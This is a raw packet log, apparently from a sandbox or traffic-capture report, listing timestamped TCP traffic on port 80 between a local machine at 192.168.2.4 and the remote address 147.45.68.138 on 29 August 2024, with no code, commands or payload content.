                                                      Aug 29, 2024 22:52:21.488238096 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.488249063 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.488254070 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.488260984 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.488271952 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.488279104 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.488282919 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.488293886 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.488297939 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.488306046 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.488306046 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.488332987 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.488358021 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.488360882 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.488378048 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.488389015 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.488399029 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.488401890 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.488413095 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.488421917 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.488425016 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.488435984 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.488444090 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.488447905 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.488459110 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.488467932 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.488468885 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.488487005 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.488507032 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.488507032 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.488534927 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.488543987 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.488545895 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.488555908 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.488568068 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.488578081 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.488584042 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.488610983 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.488625050 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.488714933 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.488727093 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.488735914 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.488746881 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.488755941 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.488758087 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.488768101 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.488780975 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.488795996 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.488897085 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.488908052 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.488917112 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.488929987 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.488940001 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.488940954 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.488950968 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.488955975 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.488964081 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.488974094 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.488980055 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.489001989 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.489023924 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.489025116 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.489067078 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.489197969 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.489209890 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.489218950 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.489229918 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.489240885 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.489240885 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.489252090 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.489263058 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.489263058 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.489274025 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.489274979 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.489286900 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.489296913 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.489296913 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.489320993 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.489321947 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.489335060 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.489343882 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.489343882 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.489355087 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.489363909 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.489389896 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.489502907 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.489515066 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.489542961 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.489563942 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.489691973 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.489702940 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.489731073 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.489748001 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.490037918 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.490050077 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.490061045 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.490072012 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.490080118 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.490083933 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.490101099 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.490118027 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.490169048 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.490180016 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.490206003 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.490226030 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.516660929 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.516671896 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.516680956 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.516686916 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.516697884 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.516709089 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.516720057 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.516731977 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.516747952 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.516784906 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.521961927 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.521974087 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.521985054 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.521996975 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.522023916 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.522056103 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.522116899 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.522128105 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.522138119 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.522150040 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.522330046 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.553627968 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.553688049 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.553711891 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.553723097 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.553733110 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.553744078 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.553822994 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.553843975 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.553855896 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.553864956 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.553864956 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.553864956 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.553864956 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.553879023 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.553888083 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.553891897 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.553900957 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.553917885 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.553924084 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.553935051 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.553936958 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.553949118 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.553956032 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.553978920 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.559811115 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.559834003 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.559844017 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.559863091 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.559875965 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.559926987 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.559937954 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.559947014 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.559957027 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.559967995 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.559971094 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.559993029 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.560007095 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.560040951 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.560051918 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.560060978 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.560070992 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.560081005 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.560084105 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.560096025 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.560107946 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.560127020 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.560148954 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.560297966 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.560316086 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.560327053 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.560348988 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.560362101 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.560393095 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.560406923 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.560416937 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.560427904 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.560436964 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.560456038 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.560477018 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.560611010 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.560657024 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.560664892 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.560681105 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.560693026 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.560700893 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.560703993 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.560709953 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.560734034 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.560743093 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.560767889 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.560781002 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.560815096 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.561266899 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.561276913 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.561285973 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.561309099 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.561316013 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.561321974 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.561326981 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.561341047 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.561352968 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.561353922 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.561363935 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.561372995 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.561386108 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.561412096 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.562293053 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.562339067 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.562340021 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.562355995 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.562374115 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.562377930 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.562385082 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.562402010 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.562407970 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.562418938 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.562418938 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.562431097 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.562447071 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.562453032 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.562482119 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.563007116 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.563019037 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.563028097 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.563055038 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.563056946 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.563067913 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.563076019 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.563077927 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.563091993 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.563102007 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.563126087 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.563246965 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.563271046 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.563282013 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.563291073 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.563317060 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.563343048 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.563354015 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.563364983 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.563376904 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.563386917 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.563388109 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.563402891 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.563426018 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.567688942 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.567702055 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.567711115 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.567737103 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.567739010 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.567749023 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.567749023 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.567761898 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.567771912 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.567774057 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.567787886 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.567809105 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.582633018 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.582698107 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.582820892 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.582832098 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.582856894 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.582873106 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.582882881 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.582892895 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.582907915 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.582917929 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.582922935 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.582943916 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.582953930 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.582963943 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.582973957 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.582983971 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.582993984 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.583003998 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.583014965 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.583017111 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.583017111 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.583017111 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.583017111 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.583017111 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.583017111 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.583017111 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.583029985 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.583031893 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.583050013 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.583056927 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.583070040 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.583084106 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.583091974 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.583106995 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.603591919 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.603631020 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.603642941 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.603709936 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.603720903 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.603729963 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.603740931 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.603755951 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.603755951 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.603755951 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.603755951 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.603774071 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.609030008 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.609041929 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.609050989 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.609077930 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.609097004 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.609111071 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.609122038 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.609132051 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.609143019 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.609148979 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.609164953 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.609185934 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.640881062 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.640932083 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.640943050 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.640949965 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.641016960 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.641032934 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.641042948 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.641053915 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.641066074 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.641077995 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:21.641125917 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:21.641125917 CEST4973980192.168.2.4147.45.68.138
